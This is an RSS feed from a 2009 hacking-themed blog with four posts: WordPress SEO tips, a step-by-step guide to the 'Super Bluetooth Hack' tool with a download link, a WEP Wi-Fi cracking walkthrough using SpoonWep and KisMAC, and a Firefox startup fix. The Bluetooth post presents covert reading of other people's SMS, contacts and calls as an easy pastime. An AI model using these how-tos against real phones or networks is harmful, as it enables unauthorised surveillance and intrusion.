<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>BotHack &#187; Hacks</title>
	<atom:link href="http://bothack.wordpress.com/category/hacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://bothack.wordpress.com</link>
	<description>Stuff you wanted to know about...</description>
	<lastBuildDate>Sun, 27 May 2012 10:22:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='bothack.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>BotHack &#187; Hacks</title>
		<link>http://bothack.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://bothack.wordpress.com/osd.xml" title="BotHack" />
	<atom:link rel='hub' href='http://bothack.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Top 5 SEO tweaks for WordPress</title>
		<link>http://bothack.wordpress.com/2009/07/17/top-5-seo-tweaks-for-wordpress/</link>
		<comments>http://bothack.wordpress.com/2009/07/17/top-5-seo-tweaks-for-wordpress/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 08:50:18 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[web 2.0]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[all in one seo]]></category>
		<category><![CDATA[backlinks]]></category>
		<category><![CDATA[custom permalinks]]></category>
		<category><![CDATA[page template]]></category>
		<category><![CDATA[seo friendly]]></category>
		<category><![CDATA[seo hacks]]></category>
		<category><![CDATA[title links]]></category>
		<category><![CDATA[whitehat seo]]></category>

		<guid isPermaLink="false">http://levoltz.com/?p=641</guid>
		<description><![CDATA[Are you looking for more traffic on WordPress? It’s not too hard to get, you just need some SEO tips to enhance your configuration. We will here give you the best tips for making your WordPress SEO friendly. Your best option is creating a Custom permalinks. For this tweak you simply change the page title [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=641&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="font-family:Times New Roman;font-size:small;">Are you looking for more traffic on WordPress? It’s not too hard to get, you just need some SEO tips to enhance your configuration.</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">We will here give you the best tips for making your WordPress SEO friendly.</span></p>
<p><span style="font-family:Times New Roman;font-size:small;"><img class="aligncenter size-full wp-image-644" title="Top 5 SEO wordpress tweaks and hacks" src="http://bothack.files.wordpress.com/2009/07/a-wordle.jpg?w=500" alt="Top 5 SEO wordpress tweaks and hacks"   /><br />
</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">Your best option is<span> </span><strong>creating a Custom permalinks</strong>. For this tweak you simply change the page title that is given by default, which is of format:<span> </span></span><a href="http://www.yourdomaincom/?p=5" target="_blank"><span style="font-family:Times New Roman;color:#0000ff;font-size:small;"><span style="text-decoration:underline;">www.yourdomaincom/?p=5</span></span></a><span style="font-family:Times New Roman;font-size:small;"><span> </span>, to a much more user friendly and search engine oriented title:<a href="http://www.yourdomainname.com/category/page" target="_blank">www.yourdomainname.com/category/page</a><span> </span>title.</span></p>
<blockquote><p><span style="font-family:Times New Roman;font-size:small;">In order to do this you need to go to Options &gt; Permalinks and change the default code for this other code –<span> </span><em>/%category%/%postname%/</em></span></p></blockquote>
<p><span style="font-family:Times New Roman;font-size:small;">Another tweak you can use is<span> </span><strong>making your titles links</strong>. Links are easier to detect by search engines, and by this, easier to be found by your users.  Luckily, you can very easily convert your titles to links permanently. To do this, go to your Main Index Template and Page Template and find the post title’s code, which will be something like<span> </span></span></p>
<p><span style="font-family:Times New Roman;font-size:small;">[h2][?php the_title(); ?][/h2]</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">but between these &gt; &lt; instead of square brackets.</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">To transform your headings into links, replace this code by these next one, always changing the square brackets with &gt; &lt;</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">[h2][a href="[?php the_permalink() ?]” rel=”bookmark” title=”Permanent Link to [?php the_title(); ?]“][?php the_title(); ?][/a][/h2]</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">You are already ahead of the rest with your new SEO improvements, but there’s more. There are plenty of Google Sitemap generator plugins for WordPress<strong>.<span> </span></strong>We&#8217;ll talk about the Google Sitemap generator plugin by<span> </span></span><a href="http://www.dagondesign.com/articles/sitemap-generator-plugin-for-wordpress/" target="_blank"><span style="font-family:Times New Roman;color:#0000ff;font-size:small;"><span style="text-decoration:underline;">Dagon Design</span></span></a><span style="font-family:Times New Roman;font-size:small;"><span> </span>specifically. You can use this very customizable (it´s options page is in the Word Press admin panel) plugin to create a sitemap for your WordPress powered site. You will be amazed by all the options it includes. From support for multi-level categories and pages to multiple-page generation with navigation; covering permalink support and letting you choose what you will display, the order of the items, and tons of other features worth checking.<br />
The last tweak we&#8217;ll talk about is adding custom Meta tags to different pages on your WordPress blog. Using the<span> </span></span><a href="http://all+in+one+seo+plugin/" target="_blank"><span style="font-family:Times New Roman;color:#0000ff;font-size:small;"><span style="text-decoration:underline;">All in one SEO plugin<span> </span></span></span></a><span style="font-family:Times New Roman;font-size:small;">you can go further than settling with a general tag for your entire site. Having several meta tags throughout the different pages on your blog will make each page’s description unique when your site appears on the SERPS, meaning more options for people to click on!<br />
With these WordPress tweaks you will be ahead of those who don´t have SEO WordPress blogs and will get lots of new visitors for sure!</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">Read more about <a title="SEO wordpress tweeks " href="http://levoltz.com/category/wordpress" target="_blank">WordPress tweaks!</a><br />
</span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/641/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/641/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/641/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/641/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/641/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/641/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/641/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/641/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/641/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/641/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/641/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/641/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/641/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/641/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=641&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2009/07/17/top-5-seo-tweaks-for-wordpress/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2009/07/a-wordle.jpg" medium="image">
			<media:title type="html">Top 5 SEO wordpress tweaks and hacks</media:title>
		</media:content>
	</item>
		<item>
		<title>How to hack a mobile phone using Super Bluetooth Hack</title>
		<link>http://bothack.wordpress.com/2009/07/17/how-to-hack-a-mobile-phone-using-super-bluetooth-hack/</link>
		<comments>http://bothack.wordpress.com/2009/07/17/how-to-hack-a-mobile-phone-using-super-bluetooth-hack/#comments</comments>
		<pubDate>Fri, 17 Jul 2009 02:23:06 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[Softwares]]></category>
		<category><![CDATA[Wireless]]></category>
		<category><![CDATA[bluetooth]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[mobile phone]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[wireless hacking]]></category>

		<guid isPermaLink="false">http://levoltz.com/?p=636</guid>
		<description><![CDATA[The following is an excellent video tutorial regarding how one can use Bluetooth to hack a cellular phone by using Super Bluetooth hacking software.  Super Bluetooth Hack will make it extremely easy to hack cellular phones thru Bluetooth and turn into a Bluetooth spy. It is so simple to do. Video Description The video instruction [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=636&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="font-family:Calibri;font-size:small;">The following is an excellent video tutorial regarding how one can use Bluetooth to hack a cellular phone by using Super Bluetooth hacking software.  Super Bluetooth Hack will make it extremely easy to hack cellular phones thru Bluetooth and turn into a Bluetooth spy. It is so simple to do.<br />
<a name="0.1_graphic02"></a><img src="https://mail.google.com/mail/?name=d33be9805ff33117.jpg&amp;attid=0.1&amp;disp=vahi&amp;view=att&amp;th=1227a62f93434399" alt="Your browser may not support display of this image." width="1" height="1" /><span style="text-align:center; display: block;"><a href="http://bothack.wordpress.com/2009/07/17/how-to-hack-a-mobile-phone-using-super-bluetooth-hack/"><img src="http://img.youtube.com/vi/T5mECQO6DZQ/2.jpg" alt="" /></a></span><span> </span><br />
</span></p>
<p><span style="font-family:Calibri;font-size:small;">Video Description</span></p>
<p><span style="font-family:Calibri;font-size:small;">The video instruction is how to hack a Sony Ericsson and a Nokia cellular phone through Bluetooth using the Super Bluetooth Hack. </span></p>
<p><span style="font-family:Calibri;font-size:small;">Download the computer program titled “Super Bluetooth Hack” (a.k.a. “BT Info“) @ </span><span style="font-family:Arial;font-size:12px;font-weight:bold;line-height:18px;text-align:justify;"><a style="color:#466edb;text-decoration:none;margin:0;padding:0;" rel="nofollow" href="http://www.getpcmemory.com/goto/http_uploading_com_files_7CSW1TEE_SuperBluetoothHack_v108_zip_html/106/3">http://uploading.com/files/7CSW1TEE/SuperBluetoothHack_v108.zip.html</a></span></p>
<p><span style="font-family:Calibri;font-size:small;">When you use the Super Bluetooth Hack, you will be able to do the following things on the &#8220;hacked&#8221; cellular phone: </span></p>
<p><span style="font-family:Calibri;font-size:small;">1.  Read and open SMS<br />
2.  Open their phone book<br />
3.  Change a profile<br />
4.  Play their ringtones even when the &#8220;hacked&#8221; cellular phone is on &#8220;silent&#8221;<br />
5.  Play mp3&#8242;s </span></p>
<p><span style="font-family:Calibri;font-size:small;">6.  Turn off the cellular phone or even restart the phone<br />
7.  Restore the phone to the original factory settings<br />
8.  Change the volume of the ringer<br />
9.  Make and receive calls from the &#8220;hacked&#8221; phone (you can even place the call on hold and make another call)</span></p>
<p><span style="font-family:Calibri;font-size:small;">What to do</span></p>
<p><span style="font-family:Calibri;font-size:small;">1.) Use &#8220;0000&#8243; as the code when the cellular phones are connecting.<br />
2.) The Bluetooth should be turned on for both phones before you begin running the BT file application.  If you don&#8217;t remember to turn it on, close out the application and run it again.<br />
3.) Download the data file.<br />
5.) Send and extract the Super Bluetooth Hack version 108.jar to your own cellular phone to open the file. </span></p>
<p><span style="font-family:Calibri;font-size:small;">What to do for a <a href="http://www.getpcmemory.com/goto/Sony_Ericsson/106/4" target="_blank">Sony Ericsson cellular phone</a> using a standard USB cable:<br />
1. Connect the cellular phone to the computer.<br />
2. It will mount as a disk.<br />
3. Move the file that you&#8217;ve downloaded (Super Bluetooth Hack version 108.jar) to the following file: /MSSEMC/Media files/other/ on that disk (your phone).<br />
4. Unplug the USB line from the cellular phone.<br />
5. Go to the “Other” folder on the phone.<br />
6. You will see a new application.  Install it by clicking the &#8220;Install&#8221; button.<br />
7. The computer program is established on the place where you specify.  Typically, the file will be in the Application&#8217;s folder.</span></p>
<p><span style="font-family:Calibri;font-size:small;">Switch the language to English:<br />
If by chance that the software starts with &#8220;Slovencina” as the language, you now can switch it to English this way:<br />
1. if you begin the application program for the very first time, you will see the word “Nastavenia.”<br />
2. Scroll down until the word, “Jazyk” is displayed.<br />
3. Click the choose button.<br />
4. Choose the “English” for your preference.<br />
5. Click on “More”.<br />
6. Lastly, click the Spat” button.<br />
7. The program is now in English.</span></p>
<p><span style="font-family:Calibri;font-size:small;">I hope you enjoy Bluetooth hacking using the Super Bluetooth file application.  As a precaution, never unnecessarily keep your Bluetooth turned on. <span> </span></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/636/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/636/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/636/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/636/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/636/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/636/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/636/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/636/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/636/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/636/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/636/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/636/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/636/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/636/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=636&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2009/07/17/how-to-hack-a-mobile-phone-using-super-bluetooth-hack/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>

		<media:content url="https://mail.google.com/mail/?name=d33be9805ff33117.jpg&#38;attid=0.1&#38;disp=vahi&#38;view=att&#38;th=1227a62f93434399" medium="image">
			<media:title type="html">Your browser may not support display of this image.</media:title>
		</media:content>
	</item>
		<item>
		<title>Top 3 Ways to Crack Wireless Networks</title>
		<link>http://bothack.wordpress.com/2009/07/16/cracking-wireless-networks/</link>
		<comments>http://bothack.wordpress.com/2009/07/16/cracking-wireless-networks/#comments</comments>
		<pubDate>Thu, 16 Jul 2009 14:42:04 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[crack]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Hardwares]]></category>
		<category><![CDATA[Wireless]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[kismac]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[spoonwep]]></category>
		<category><![CDATA[WEP]]></category>

		<guid isPermaLink="false">http://levoltz.com/?p=589</guid>
		<description><![CDATA[The cracking technique I addressed late last week required you to type in ten cumbersome commands that is easy to fat finger.  Although there is no simple user interface with a gigantic push button that states, “Crack” and plays the Mission Impossible theme music, a few windowed alternatives are practically more operable. SpoonWep in BackTrack [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=589&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="font-family:Calibri;font-size:small;">The cracking technique I addressed  late last week required you to type in ten cumbersome commands that  is easy to fat finger.  Although there is no simple user interface  with a gigantic push button that states, “Crack” and plays the Mission  Impossible theme music, a few windowed alternatives are practically  more operable. </span></p>
<p><strong><span style="font-family:Calibri;font-size:small;">SpoonWep in BackTrack III</span></strong></p>
<p><span style="font-family:Calibri;font-size:small;"><img class="aligncenter size-full wp-image-591" title="spoon wep cracker" src="http://bothack.files.wordpress.com/2009/07/spoon-wep-cracker.jpg?w=500" alt="spoon wep cracker"   /></span></p>
<p><span style="font-family:Calibri;font-size:small;">With the aforementioned BackTrack III  live compact disc or VMware image that I employed late last week, I  got around virtually all of the commands you will pick up there and  utilize SpoonWep as an alternative.  When you have rebooted into  BackTrack III, from the KDE computer menu, select BackTrack—Radio  Network Analysis—80211—Cracking—SpoonWep.  All that you’ll  require to execute SpoonWep versus a Wi-Fi network is the BSSID and  Channel SSID. </span></p>
<p><span style="font-family:Calibri;font-size:small;">Access the BSSID in the “Victim Mac”  area of SpoonWep.   Select your wireless fidelity adapter  from the drop down menu list, adjust the channel, and then launch the  attack.  Decrease or increase the injection range utilizing the  slider. </span></p>
<p><span style="font-family:Calibri;font-size:small;">Regarding the BackTrack IV pre-release,  several commenters call attention that it tolerates many wireless cards  and may crack passwords quicker than using aircrack ptw.  BT4 systematically  freezes on me; however, I think it was the edition of the Alfa USB transcriber  I was utilizing that induced the problem. </span></p>
<p><strong><span style="font-family:Calibri;font-size:small;">KisMAC for the Mac OS X</span></strong></p>
<p><span style="font-family:Calibri;font-size:small;"><img class="aligncenter size-medium wp-image-590" title="kismac mac os x wep cracking" src="http://bothack.files.wordpress.com/2009/07/kismac_wlan_info.gif?w=433&h=244" alt="kismac mac os x wep cracking" width="433" height="244" /></span></p>
<p><span style="font-family:Calibri;font-size:small;">Whenever you would like to acquire  your crack on the Mac, download the complimentary KisMAC.  KisMAC  can’t crack WEP on your standard built in Airport card; you will all  the same, require a card that operates with a KisMAC device driver that  supports bundle injection.  If you are utilizing an Alfa 500mw  like I currently use, you will be able to utilize the standard USB RTL8187L  driver.  From KisMAC’s Preferences drop down menu, add the device  driver that works with the wireless adapter.  Scan for all of the  networks and decide on the network you would like to crack.  Once  you decide on the network, go to the Network drop down menu and choose  “de-authenticate”.  As soon as the “Unique IVs” number  is sufficient, choose Crack from the Network menu, and pick your attack.</span></p>
<p><span style="font-family:Calibri;font-size:small;"><a href="http://www.youtube.com/watch?v=vEUP-R6Kj-g"><span style="text-align:center; display: block;"><a href="http://bothack.wordpress.com/2009/07/16/cracking-wireless-networks/"><img src="http://img.youtube.com/vi/vEUP-R6Kj-g/2.jpg" alt="" /></a></span></a><br />
</span></p>
<p><strong><span style="font-family:Calibri;font-size:small;">Windows OS:  Aircrack-ng suite</span></strong></p>
<p><span style="font-family:Calibri;font-size:small;">From my vast experience, there is no  non-command line software that you can set up on Windows to crack wireless  encryption Protocol (WEP).  There are several tutorials on how  to install the aircrack-ng suite for Windows and successfully running  it.  I have tried a couple of them, but I quickly went back to  BackTrack III. </span></p>
<p><strong><span style="font-family:Calibri;font-size:small;">Finally, You Recognize How to Safely  Secure Your Wireless Network</span></strong></p>
<p><span style="font-family:Calibri;font-size:small;">Acknowledging how to crack wireless  encryption protocol keys does not imply you go out and breach people’s  wireless fidelity electronic networks.  It means that you have  witnessed firsthand, precisely how “crackable” wireless encryption  protocol keys are.  I have “acknowledged” for a long time now  that the WPA is better than wireless encryption protocol, but the bridge  on my electronic network offers WPA, but could not authenticate with  it on my router.  It was not until I published my article last  week where I acquired an updated working router.  That is the ability  of examining something in action, where you have generally got to wade  through blackhat internet sites. </span></p>
<p><span style="font-family:Calibri;font-size:small;">This is an awkward matter, naturally,  but thanks to every last one of you, the feedback thread from last week’s  article enlightened a few of the finer points when it comes to wireless  security.  To quickly recap:  Wireless encryption protocol  does not in reality keep anybody away.  I appreciate MaribelAlligator’s  equivalence of a wireless encryption protocol key to a home bedroom  lock, the lock you can simply open by using a butter knife.  Everybody  acknowledges how to unlock it, but when it is fastened, everybody that  passes by realizes that they should stay out.  Glenn Fleishman  equates WEP to a “Do Not Enter” sign.  A clear cut indicator  that the people on the inside do not want you in, but nothing in reality  will keep you out. </span></p>
<p><span style="font-family:Calibri;font-size:small;">WPA is also “crackable”, but it  is harder.  A wired electronic network is better secured than a  wireless fidelity electronic network, as it is harder to link up to  it.  If wiring your house is not an alternative, choose the WPA2  whenever possible.  As a lot of commenters remarked, WPA has been  cracked in a few conditions as well, but it is not doe as easy as WEP.   To explain, MaribelAlligator continues with the “bedroom lock” analogy:</span></p>
<blockquote><p><span style="font-family:Calibri;font-size:small;">WPA is similar to your standard home  door lock; it is a bit more secure, however, it’s all the same, easy  to get in for someone with the knowledge, circumstances, and right tools.   WPA2 is equivalent to a safe at the bank.  It perhaps is conceivable  to overcome, depending on how it is set up, although it is not realistically  conceivable for anyone to actually do it, yet.</span></p></blockquote>
<p><span style="font-family:Calibri;font-size:small;">Filtering out MAC addresses and concealing  SSID&#8217;s does not matter to those who would like to get in. A couple of  commenters have stated that they have ceased transmitting their router&#8217;s  SSID, and set up their MAC address filtering system that exclusively  admits particular devices to associate to it. This criteria will bar  those who do not recognize what they are doing, but not to those who  do. </span></p>
<p><span style="font-family:Calibri;font-size:small;">Not airing your SSID is similar to  removing the address numbers off of a house.  The house is still  there, and everybody can see it.  It is just a little harder to  discover for those that do not know what they&#8217;re searching for already.  Filtrating by MAC address is similar to having a bouncer at the main  door that inspects everyone&#8217;s credentials against a list if they are  allowed to enter. The sole problem is that the bouncer does not remember  what people look like or call for identification, so anyone that can,  will eavesdrop to hear what names are allowed in, and then admit to  being the person on the bouncer&#8217;s list. </span></p>
<p><span style="font-family:Calibri;font-size:small;">In conclusion, protect your material  using several layers of protection. Whether your electronic network  is wireless or wired, WPA, WPA2, or open, acquire a lot of measures  to thoroughly secure your crucial stuff. Password your electronic network,  perform malware and virus sweeps, run firewalls, and back up your data.   Do not swear totally on your wireless router&#8217;s password </span></p>
<p><span style="font-family:Calibri;font-size:small;">If you have older devices that exclusively  support WEP, you have to balance risk over reward. If your Play Station  II only understands WEP, and you need wireless access, use the WEP while  understanding what the dangers are located.</span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/589/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/589/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/589/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/589/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/589/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/589/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/589/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/589/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/589/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/589/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/589/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/589/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/589/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/589/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=589&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2009/07/16/cracking-wireless-networks/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2009/07/spoon-wep-cracker.jpg" medium="image">
			<media:title type="html">spoon wep cracker</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2009/07/kismac_wlan_info.gif?w=300" medium="image">
			<media:title type="html">kismac mac os x wep cracking</media:title>
		</media:content>
	</item>
		<item>
		<title>How-to Fix Slow Startups for Firefox 3.5</title>
		<link>http://bothack.wordpress.com/2009/07/15/how-to-fix-slow-startups-for-firefox-3-5/</link>
		<comments>http://bothack.wordpress.com/2009/07/15/how-to-fix-slow-startups-for-firefox-3-5/#comments</comments>
		<pubDate>Wed, 15 Jul 2009 21:18:40 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[folder]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[slow startup]]></category>

		<guid isPermaLink="false">http://levoltz.com/?p=605</guid>
		<description><![CDATA[Whenever you discover yourself with longer than normal startup times after you upgraded to the new Firefox 3.5, you might have contracted a bug where Firefox 3.5 acquires the haphazardness it demands for protection purposes on Windows operating systems. The operation postulates scanning a few temporary files (folders), searching for information typically contributed by operating [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=605&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><span style="font-family:Calibri;font-size:small;">Whenever you discover yourself with  longer than normal startup times after you upgraded to the new Firefox  3.5, you might have contracted a bug where Firefox 3.5 acquires the  haphazardness it demands for protection purposes on Windows operating  systems.</span></p>
<p><span style="font-family:Calibri;font-size:small;">The operation postulates scanning a  few temporary files (folders), searching for information typically contributed  by operating system and other typical application operations. Firefox  3.5 searches for additional files and deeper subfolders for accumulated  randomness, but it&#8217;s led to unforeseen events for users with excessively  temporary files or folders that result in slower startup times. </span></p>
<p><span style="font-family:Calibri;font-size:small;"><img class="aligncenter size-full wp-image-606" title="How to fix Firefox 3.5 slow startups on Windows" src="http://bothack.files.wordpress.com/2009/07/picture-7.jpg?w=500" alt="How to fix Firefox 3.5 slow startups on Windows"   /><br />
</span></p>
<p><span style="font-family:Calibri;font-size:small;">Try builds are all the same being yielded  with surefire fixes to this unfortunate bug, but several users describe  a detectable improvement after erasing their Internet Temp files generated  the IE and their temporary folders. </span></p>
<p><span style="font-family:Calibri;font-size:small;">To clean out the temporary folders,  check the following files and delete.  Please follow the example  below: </span></p>
<p><span style="font-family:Calibri;font-size:small;">C:\Documents and Settings\*user*\Local  Settings\History<br />
C:\Documents and Settings\*user*\Local Settings\Temporary Internet Files<br />
C:\Documents And Settings\*user*\Local Settings\Temp<br />
C:\Documents And Settings\*user*\Recent</span></p>
<p><span style="font-family:Calibri;font-size:small;">On Windows Vista /7:</span></p>
<p><span style="font-family:Calibri;font-size:small;">%USERPROFILE%\AppData\Local\Microsoft\Windows\History<br />
%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files<br />
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent<br />
%TEMP%</span></p>
<p><span style="font-family:Calibri;font-size:small;">To erase Internet Temp Folders, go  to the Control Panel and open up the Internet Options section. In your  Browsing History area, click the Delete button and check off the options  and click Delete.</span></p>
<p><span style="font-family:Calibri;font-size:small;">A few users have reported a substantial  betterment after performing these small steps, even for those of you  who use IE occasionally.</span></p>
<p><span style="font-family:Calibri;font-size:small;">A fix for the problem will be available  with the patch Firefox 3.5.1, which is expected to be released in the  next couple of weeks. </span></p>
